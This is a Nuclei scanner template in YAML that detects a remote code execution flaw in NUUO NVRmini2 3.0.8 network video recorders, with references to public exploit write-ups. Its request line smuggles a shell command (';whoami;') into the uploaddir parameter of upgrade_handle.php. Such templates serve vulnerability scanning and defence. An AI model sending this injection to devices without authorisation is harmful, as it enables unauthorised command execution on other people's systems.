nuclei-templates/vulnerabilities/nuuo-nvrmini2-rce.yaml

27 lines
667 B
YAML
Raw Normal View History

id: nuuo-nvrmini2-upgradehandlephp-rce
info:
name: NUUO NVRmini2 3.0.8 - Remote Code Execution
author: berkdusunur
severity: critical
# Reference:-
2020-11-23 18:26:36 +00:00
# https://www.exploit-db.com/exploits/45070
# https://github.com/berkdsnr/NUUO-NVRMINI-RCE
# https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
requests:
- method: GET
path:
- "{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27"
matchers-condition: and
matchers:
- type: regex
regex:
- "/upload_tmp_dir/"
part: body
- type: status
status:
- 200